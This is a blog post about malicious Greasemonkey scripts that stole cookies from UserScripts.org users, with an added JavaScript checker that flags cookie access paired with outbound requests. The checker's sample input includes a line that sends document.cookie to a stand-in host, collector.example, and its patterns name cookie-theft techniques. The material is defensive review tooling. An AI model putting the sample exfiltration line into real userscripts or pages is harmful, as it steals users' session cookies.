Firefox Facts

Greasemonkey Security Issues

Well, this is one of those security issues that everybody always knew was there, but the community usually did a good job of policing itself so that it did not become an issue. It looks like somebody has been creating and uploading Greasemonkey scripts that steal your cookies. Since your cookies store a lot of information about you, you can see this is kind of a big deal.

Here is the post that got my attention on UserScripts.org:

Someone has been attempting to post scripts that steal cookies. Thanks to several alert us.o citizens (including davey, descriptor, loucypher, joel h, pogue) we have been able to note that the script is malicious and then delete them.

I’m putting up a banner to warn people that newly uploaded/updated scripts should be put under extra scrutiny.

I’ve also decreased the cache duration of rss feeds to 10 minutes, so if you keep an eye on http://userscripts.org/feeds/recent_scripts it will be a lot fresher than normal (it was cached for an hour)

So yes, everybody should be extra careful when downloading scripts like this – even if it is from a trusted source. I am happy to see the UserScripts.org team moved so quickly on this though. That makes me feel a lot better about my continued use of their Firefox extension.
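
As an added example (not from the original post or from UserScripts.org), here is one way to give a newly uploaded script the extra scrutiny described above: a small JavaScript check that parses the ==UserScript== header and flags cookie access that appears alongside a way to send data off the page. The patterns, the verdict labels and the sample script are assumptions constructed for illustration.

```javascript
// Added example: static pre-install review of userscript source text.
// Patterns and verdict labels are illustrative assumptions, not a complete list.
function parseMetadata(source) {
  const meta = Object.create(null); // no prototype, so odd @keys are harmless
  const block = source.match(/\/\/\s*==UserScript==([\s\S]*?)\/\/\s*==\/UserScript==/);
  if (!block) return meta;
  for (const line of block[1].split(/\r?\n/)) {
    const m = line.match(/^\s*\/\/\s*@(\S+)\s+(.*\S)\s*$/);
    if (m) (meta[m[1]] = meta[m[1]] || []).push(m[2]);
  }
  return meta;
}

const COOKIE_READ = /\bdocument\s*(\.\s*cookie\b|\[\s*['"]cookie['"]\s*\])/;
const SINKS = {
  GM_xmlhttpRequest: /\bGM_xmlhttpRequest\b/,
  XMLHttpRequest: /\bXMLHttpRequest\b/,
  "src assignment": /\.src\s*=[^=]/,
  "location assignment": /\blocation\s*(\.href\s*)?=[^=]/,
  "form submit": /\.submit\s*\(/,
};
const OBFUSCATION = /\b(eval|unescape|atob)\s*\(|\bString\.fromCharCode\b/;
const BROAD_INCLUDE = /^(\*|[a-z*]+:\/\/\*(\/.*)?)$/i; // wildcard-only host

function reviewUserscript(source) {
  const meta = parseMetadata(source);
  const includes = meta.include || [];
  const readsCookies = COOKIE_READ.test(source);
  const sinks = Object.keys(SINKS).filter((name) => SINKS[name].test(source));
  // Greasemonkey treats a script with no @include as matching every page.
  const broadScope = includes.length === 0 || includes.some((p) => BROAD_INCLUDE.test(p));
  const obfuscated = OBFUSCATION.test(source);
  let verdict = "no-findings";
  if (readsCookies || obfuscated) verdict = "needs-review";
  if (readsCookies && sinks.length > 0) verdict = "suspicious";
  const name = (meta.name || ["(unnamed)"])[0];
  return { name, readsCookies, sinks, broadScope, obfuscated, verdict };
}

// Constructed sample input (not a real script from UserScripts.org).
const SAMPLE_SCRIPT = [
  "// ==UserScript==",
  "// @name     Forum Helper (constructed sample)",
  "// @include  *",
  "// ==/UserScript==",
  'new Image().src = "http://collector.example/c?v=" + encodeURIComponent(document.cookie);',
].join("\n");
console.log(reviewUserscript(SAMPLE_SCRIPT));
```

A clean result only means none of these patterns matched; it helps decide which scripts to read first and does not replace reading them.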



 

Reader's Comments

  1. This is scary indeed. It goes to show that we should view user scripts like .exe files – with great suspicion. I just wrote a blog entry on this issue that you might find interesting:

    http://dev2dev.bea.com/blog/plaird/archive/2007/08/enterprise_grea.html

  2. Very interesting read indeed, thanks for the heads up!

Mitch Keeler © 2009